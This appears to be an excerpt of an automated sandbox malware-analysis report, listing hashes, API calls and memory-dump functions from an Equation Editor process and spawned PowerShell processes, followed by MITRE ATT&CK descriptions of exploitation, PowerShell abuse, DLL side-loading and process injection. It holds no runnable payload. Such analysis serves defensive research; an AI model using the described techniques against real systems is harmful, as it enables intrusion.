Instruction ID: f01f3ae6075770e0c702e3a889afa855ecfcc91c072c130e082b68ae1315d1ef
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: 44F0E2A05CC34129E711E7742C5AFA96F24BFC3A40F140889B2434F0F7E884880086A9

Uniqueness

Uniqueness Score: -1.00%

Function 035306D0 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035306E2

Part of subcall function 035306F5: ExitProcess.KERNEL32(00000000), ref: 035306FA

Memory Dump Source

Source File: 0000000C.00000002.493378697.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 97298cc180cacae44a9ddce9dea5b1a6ce99c3e0a80e0575bf18805803aa0a39
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: F701F95999434221DB30E6686C557FAAB15FB83700FCC8C56A5834B0F6D59894C38EAD

Uniqueness

Uniqueness Score: -1.00%

Function 035306BB Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.493378697.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: 949f601b9571b228a85f920520333ad5e7a8075a1c032bd999e033463c3d6e4e
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: A2017D2458830231E730E3282C88BFDAB85FBC3744F98886AF1434B0F6D28858438E9D

Uniqueness

Uniqueness Score: -1.00%

Function 035305A9 Relevance: 1.6, APIs: 1, Instructions: 100
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(0353061B), ref: 03530629

Memory Dump Source

Source File: 0000000C.00000002.493378697.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3530000_EQNEDT32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4d38ec5a8e89bd17efadd5f619de0dac842c61bdcf31c92b651a90c039385558
Instruction ID: 6f05bf158cc0679b1907bf7c370d77ed0793c06a086f1a1e7d9ee53c6b97eaef
Opcode Fuzzy Hash: 4d38ec5a8e89bd17efadd5f619de0dac842c61bdcf31c92b651a90c039385558
Instruction Fuzzy Hash: 9D3178A688D7C62FD712D7306D7A555BF643AA3004B0DCACFC4D60A4E3E758A102D797

Uniqueness

Uniqueness Score: -1.00%

Function 035306F5 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 035306FA

Memory Dump Source

Source File: 0000000C.00000002.493378697.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 035306FC Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.493378697.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3530000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: a1210cb39333140b0189a14b433918c8c55172f312149f67775f513ca5f79995
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 6CD052352126029FC304DB04D980E17F3BAFFC8210B28C268E0054BA6AC330E892CA90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03530574 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(03530562), ref: 03530574

Memory Dump Source

Source File: 0000000C.00000002.493378697.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 923e85ec73d2c7c2287b78cdb04c7fa5976c65034ea919722f94dba668933b08
Instruction ID: 9d95c6946a116798ce6ab69e31d22190cbd58f06cc09e2beaf0b84f498ef1c40
Opcode Fuzzy Hash: 923e85ec73d2c7c2287b78cdb04c7fa5976c65034ea919722f94dba668933b08
Instruction Fuzzy Hash: D71197A688E7C44FD712D7707AAA155BF607EA3400B1D86DFC0970F0F7E6548106D3AA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 2856, Parent PID: 2096COMMON

Executed Functions

Function 0011D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.584664792.000000000011D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0011D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_11d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0d96fcd73d1089fef307fa30944bebf5dc773da3c76244fec0ef98fb9771d6
Instruction ID: 158c196600c93f295c3ba98d8006a5d5f4c517ae7b1afada4135bba80fb4600b
Opcode Fuzzy Hash: 3b0d96fcd73d1089fef307fa30944bebf5dc773da3c76244fec0ef98fb9771d6
Instruction Fuzzy Hash: A101F771508340AAE7145E25ECC47A7BFD8EF89724F18C42AFC450B282C3799D85CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0011D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.584664792.000000000011D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0011D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_11d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b7ad1e557c1bf5df0aaa31384c8ed12eed76be7aadbb2ca535cb145ae229084
Instruction ID: cb50167134b7c244d0c172250cea61093ee9cc7661e733884b248cd6b3be6b0f
Opcode Fuzzy Hash: 5b7ad1e557c1bf5df0aaa31384c8ed12eed76be7aadbb2ca535cb145ae229084
Instruction Fuzzy Hash: 7CF0C271504344AFE7108A15DCC4BA3FF98EB85724F18C55AFD480A282C3799C85CAB0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 1700, Parent PID: 2856COMMON

Executed Functions

Function 00824998 Relevance: 18.2, Strings: 14, Instructions: 665COMMON

Download Yara Rule

Strings

h%;i, xrefs: 00824DA2
h%;i, xrefs: 0082509A
h%;i, xrefs: 008250A8
h%;i, xrefs: 00824BF2
8#9i, xrefs: 0082517A
h%;i, xrefs: 00824BE4
h%;i, xrefs: 00824D94
+", xrefs: 00824A38
[;i, xrefs: 008249DE
+", xrefs: 00824A46
h%;i, xrefs: 00824F37
h%;i, xrefs: 00824F45
[;i, xrefs: 008249E8
8#9i, xrefs: 00825188

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: +"$ +"$8#9i$8#9i$h%;i$h%;i$h%;i$h%;i$h%;i$h%;i$h%;i$h%;i$[;i$[;i
API String ID: 0-2310884198
Opcode ID: 6163b25adca45ff56465ce1e29d8bbc91aa8d644b0ca7e7f9d8bdf8a59f1852d
Instruction ID: 45fd40afba3ed56f8d6d0bedbbf9ad54f704488047aaf35195b7c51d505c2210
Opcode Fuzzy Hash: 6163b25adca45ff56465ce1e29d8bbc91aa8d644b0ca7e7f9d8bdf8a59f1852d
Instruction Fuzzy Hash: 21221835B042248FDB159BA8E85076ABBE2FFD5320F2984AAC549CB355DA31CDC1C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 008241A0 Relevance: 16.9, Strings: 13, Instructions: 646COMMON

Download Yara Rule

Strings

h%;i, xrefs: 008246A9
h%;i, xrefs: 008246B7
h%;i, xrefs: 0082454F
<4g, xrefs: 008244BD
h%;i, xrefs: 0082482C
h%;i, xrefs: 0082455D
<4g, xrefs: 0082446C
h%;i, xrefs: 0082483A
<4g, xrefs: 008244C9
P_g, xrefs: 00824878
h%;i, xrefs: 00824380
h%;i, xrefs: 0082438E
<4g, xrefs: 0082422F

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: <4g$<4g$<4g$<4g$P_g$h%;i$h%;i$h%;i$h%;i$h%;i$h%;i$h%;i$h%;i
API String ID: 0-667413639
Opcode ID: 4a2fce3086ee923dbf60f5786c361b017860b513d24620aab70a7f8dad4e4243
Instruction ID: 9579e1b85f4a5d7cacb8f605a53caac05e8a731f7ebb8a3465fa241d1eb51b38
Opcode Fuzzy Hash: 4a2fce3086ee923dbf60f5786c361b017860b513d24620aab70a7f8dad4e4243
Instruction Fuzzy Hash: 47222735B002249FDB249A64A850B7ABBE2FFD5311F2484BAC545CB295DB31CDC6C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 008214E8 Relevance: 6.8, Strings: 5, Instructions: 521COMMON

Download Yara Rule

Strings

8#9i, xrefs: 00821B3A
8#9i, xrefs: 00821B48
[;i, xrefs: 008215EC
0@$, xrefs: 008215B7
[;i, xrefs: 008215DE

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: 0@$$8#9i$8#9i$[;i$[;i
API String ID: 0-158286197
Opcode ID: 3f44ce44fcf42f7872540ba1a50db87fc342c9d544fd772cea512a846773c08a
Instruction ID: 1cad2bfbda79ad48f7ff6fb8334e5b9234ac5d8b13bbf3171b14e5a5f3566296
Opcode Fuzzy Hash: 3f44ce44fcf42f7872540ba1a50db87fc342c9d544fd772cea512a846773c08a
Instruction Fuzzy Hash: 8D025835B042249FDF249A64A898B6ABBE2FFE5310F3484BAD445DB381DA71CDC1C791

Uniqueness

Uniqueness Score: -1.00%

Function 008220B8 Relevance: 4.6, Strings: 3, Instructions: 839COMMON

Download Yara Rule

Strings

\$", xrefs: 00822A92
<g, xrefs: 00822BCE
\$", xrefs: 00822A85

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: <g$\$"$\$"
API String ID: 0-432897457
Opcode ID: 51951ab7a3f24a7597d3d70fc9f9c2a56a71f0ed78422a89c87dca7714cc9805
Instruction ID: 8c5d8f7b33c25b2600b1d502a471def9494c6de645809ff5f4edd14540f1145d
Opcode Fuzzy Hash: 51951ab7a3f24a7597d3d70fc9f9c2a56a71f0ed78422a89c87dca7714cc9805
Instruction Fuzzy Hash: 5C520534B04229EFDB249F64E8506AAB7E2FF95310F24C4AAD815CB251DB35CDC5CB62

Uniqueness

Uniqueness Score: -1.00%

Function 008229C8 Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

\$", xrefs: 00822A92
\$", xrefs: 00822A85

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: \$"$\$"
API String ID: 0-811280390
Opcode ID: d377eebeda4b224048ec7015a7f20e2290e867c1a68bf2e765e19f3b7e7c13fc
Instruction ID: 7dab0361da92688f1034ee28ad25dba42129bf911569bcfcf3f189c24e2eb5d8
Opcode Fuzzy Hash: d377eebeda4b224048ec7015a7f20e2290e867c1a68bf2e765e19f3b7e7c13fc
Instruction Fuzzy Hash: D9319E30A00229FFDF28DE59E844BAAB7B2FB44321F148065E806CB691C771DDE1CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00824180 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

<4g, xrefs: 0082422F

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: <4g
API String ID: 0-1417196670
Opcode ID: bbd23a430fd896613b64ff46d853b36289cfb0a5818627c66b134503f5530be0
Instruction ID: 3039ab6286a6e2b7774404bed10ee56c08d3406b590dc5d0fe7b2489604f688b
Opcode Fuzzy Hash: bbd23a430fd896613b64ff46d853b36289cfb0a5818627c66b134503f5530be0
Instruction Fuzzy Hash: 68410374A00321DFCB25CA64A844E79BBB1FF89300B2990AAD905DF396D731CD85CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00820EA8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7a7f538583115e72fec2a4ef1574b4be7e708dbb3e60b6852134bf5e4de38ea
Instruction ID: d3f2c02ebca014e241597087e030db5cb8f8d8ced177796d5091fb130d7b8798
Opcode Fuzzy Hash: a7a7f538583115e72fec2a4ef1574b4be7e708dbb3e60b6852134bf5e4de38ea
Instruction Fuzzy Hash: 8A8167347002689BDF245A74A854B7AB7A2FFE5310F34846AD905DB2C2DE72CDC6CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00820E88 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a65663bb0defda9c23f6445032bb16dad3cd53f08c0beac39099e0f4ee8ca03
Instruction ID: c341aee276f64ef67b517a4fd6e1e2b97d32efb3cc162460df9bb3180c5a18da
Opcode Fuzzy Hash: 0a65663bb0defda9c23f6445032bb16dad3cd53f08c0beac39099e0f4ee8ca03
Instruction Fuzzy Hash: F8416834604368AFDF345A34A954A7A7B62FFA4300F244066C905EB2D7CB75CCC6CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00824DF0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5e89a74ac5fc2879aebc668f6bc20b50e3cb0c17a433f20d768283d3a1f615
Instruction ID: 6ace4429e701911d0fba29b956ada17eb097b766d541dcf7af82fb35bfc8ca8f
Opcode Fuzzy Hash: bf5e89a74ac5fc2879aebc668f6bc20b50e3cb0c17a433f20d768283d3a1f615
Instruction Fuzzy Hash: BB21B039A00225DFDB24DF68E540A6AB7F2FB88320F269165D909DB259D731DDC0CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00822470 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4274ca21a304a5e92ee80c199a49ba6c658ce753fd557ff0bdbfb129929efc4
Instruction ID: 3bcc755c0b454a34b4e19e5b4dc36b2743d0f5d621cf95a872aa20435215d8c9
Opcode Fuzzy Hash: e4274ca21a304a5e92ee80c199a49ba6c658ce753fd557ff0bdbfb129929efc4
Instruction Fuzzy Hash: 46216D70A00225EFDB64EE25E164B69B7E2FF94320F14C166E408D7254DB74DDC1DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0011D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.513048827.000000000011D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0011D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dc672cb7b7e4a50f915f5adc013c27001101e04418b368394a3ca29f7560a47
Instruction ID: a26be3662bf77c68023f07627245a81493eaec022d7129934368a8c32176ac67
Opcode Fuzzy Hash: 9dc672cb7b7e4a50f915f5adc013c27001101e04418b368394a3ca29f7560a47
Instruction Fuzzy Hash: A201F771508340AAE7285E25ECC47A7BBD8DF85720F18C02AFC450B182C3799D85CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00820FF7 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca30ce8c071b69046880ecae4304533006870e28ae2170f8bcbc58bc2a84bbb
Instruction ID: baccac5cc52d5e0a443cc163a027da477d70be35d98cd896a3f0b6dcbab83d10
Opcode Fuzzy Hash: 8ca30ce8c071b69046880ecae4304533006870e28ae2170f8bcbc58bc2a84bbb
Instruction Fuzzy Hash: A6012634B00124EBDF28B660A964A7EB761FBAC700B308022D905FB249CB728D868791

Uniqueness

Uniqueness Score: -1.00%

Function 0011D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.513048827.000000000011D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0011D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c88f10c058bd5212a7637d62b23b1db56baa010a418ef00321485d978f90f24b
Instruction ID: cfd8a8baf3943db811d001c3a99274a6cb3275a0a02cb4d7b7d2e63be52d558d
Opcode Fuzzy Hash: c88f10c058bd5212a7637d62b23b1db56baa010a418ef00321485d978f90f24b
Instruction Fuzzy Hash: FDF06271504344AFE7248E16DCC4BA3FB98EB55724F18C56AED484A282C3799C85CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00823818 Relevance: 9.2, Strings: 7, Instructions: 482COMMON

Download Yara Rule

Strings

<4g, xrefs: 00823A3D
h%;i, xrefs: 00823AFE
<4g, xrefs: 00823A49
<4g, xrefs: 008239EC
h%;i, xrefs: 00823C6D
h%;i, xrefs: 00823AF0
h%;i, xrefs: 00823C5F

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: <4g$<4g$<4g$h%;i$h%;i$h%;i$h%;i
API String ID: 0-2830641914
Opcode ID: 94bc021a39a58eab2c514a68d79e5ada7665852a3cf78cd468740c621d5cb033
Instruction ID: 5a5ec509c64626096a151c7b0fb59cf6d6e69be1626bb4bb9ffa43552012d46e
Opcode Fuzzy Hash: 94bc021a39a58eab2c514a68d79e5ada7665852a3cf78cd468740c621d5cb033
Instruction Fuzzy Hash: 9BF17A35B002249FDB149E68A8606AABBF1FFD5320F24847BD445CB251DB79CEC6C792

Uniqueness

Uniqueness Score: -1.00%

Function 008200A0 Relevance: 9.2, Strings: 7, Instructions: 403COMMON

Download Yara Rule

Strings

L4#p, xrefs: 008201BE
L4#p, xrefs: 00820419
L4#p, xrefs: 008201C9
('$, xrefs: 00820563
L4#p, xrefs: 00820160
L4#p, xrefs: 008203B0
L4#p, xrefs: 0082040E

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: ('$$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p
API String ID: 0-1752674047
Opcode ID: 785f9d87ceda6eb300230d8fa208be97df3fd16f23edb80add6492956622c98e
Instruction ID: 8017daa8519dc57f606fbb2e57353fe2fd1d80e9e5d8e29a0656eca5541959e9
Opcode Fuzzy Hash: 785f9d87ceda6eb300230d8fa208be97df3fd16f23edb80add6492956622c98e
Instruction Fuzzy Hash: 2ED13735B00228EFDB159A68E854BBE77A2FF84310F148426E905DB293DB70DD85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00825B1C Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

<4g, xrefs: 00825B8C
<4g, xrefs: 00825BE9
<4g, xrefs: 00825BDD
h%;i, xrefs: 00825C6F
h%;i, xrefs: 00825C7D

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: <4g$<4g$<4g$h%;i$h%;i
API String ID: 0-2026866472
Opcode ID: 6a7ec1991a67f0cc5e342d32f1edef82de398699f86f2644d08a1438ddc2a0d7
Instruction ID: e3beaf79e206ca2069f5c2bf313ff5c79ae2fb1d6d2282423cc55dfd356a1b77
Opcode Fuzzy Hash: 6a7ec1991a67f0cc5e342d32f1edef82de398699f86f2644d08a1438ddc2a0d7
Instruction Fuzzy Hash: 9F319035B80725DBC7255A74A45067BB791EFE5720F24847AC542CF284DB31CCC6D792

Uniqueness

Uniqueness Score: -1.00%

Function 00823F20 Relevance: 5.2, Strings: 4, Instructions: 197COMMON

Download Yara Rule

Strings

h%;i, xrefs: 0082404A
`\8i, xrefs: 00824140
h%;i, xrefs: 00824058
`\8i, xrefs: 0082414E

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: `\8i$`\8i$h%;i$h%;i
API String ID: 0-1341027457
Opcode ID: 13a9537bf09836416daae1114d4f4173907219f8248d06e7f92d3694f31e1865
Instruction ID: 6036cf6cc75328cd89c9f9fa59717832f7459b9a5672d6553cfbb95f62b789ce
Opcode Fuzzy Hash: 13a9537bf09836416daae1114d4f4173907219f8248d06e7f92d3694f31e1865
Instruction Fuzzy Hash: 0D516534B043249FD7149A68A860B7ABBB5FFD5300F24887BD949CB291DA35CDC5C762

Uniqueness

Uniqueness Score: -1.00%

Function 008251D8 Relevance: 5.2, Strings: 4, Instructions: 170COMMON

Download Yara Rule

Strings

h%;i, xrefs: 008252B2
P_g, xrefs: 008252EF
h%;i, xrefs: 008252A4
<4g, xrefs: 0082524E

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: <4g$P_g$h%;i$h%;i
API String ID: 0-239091427
Opcode ID: cb8feb189e07255a3ddf8ad8e49cd57094d70e8ad0709d111b0d985f9c9920d1
Instruction ID: c62b60f623d5596cf1eb9734fd3464fde22775a5afa16c59b7c58e9b3cf589b9
Opcode Fuzzy Hash: cb8feb189e07255a3ddf8ad8e49cd57094d70e8ad0709d111b0d985f9c9920d1
Instruction Fuzzy Hash: 835167357442209FD7149A64A850A3ABBA6FFDA310F18C87BD545CF296CB72CC85C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00825F7A Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

L4#p, xrefs: 00826020
L4#p, xrefs: 0082607E
lH", xrefs: 008260ED
L4#p, xrefs: 00826089

Memory Dump Source

Source File: 00000012.00000002.513290038.0000000000820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_820000_powershell.jbxd

Similarity

API ID:
String ID: L4#p$L4#p$L4#p$lH"
API String ID: 0-3094183221
Opcode ID: a2eabc73123c4a29f87aead334d10759c3dbdc31ea0b6ebea075013905359244
Instruction ID: 81543524b3ecf7ce92e518e9745d3451ddc196feddda681a22b0bf83e456bf95
Opcode Fuzzy Hash: a2eabc73123c4a29f87aead334d10759c3dbdc31ea0b6ebea075013905359244
Instruction Fuzzy Hash: EA515A35B00225EBDB259F64E85077E77A2FF84310F248425EA05DB2C2EB71DDA4D792

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

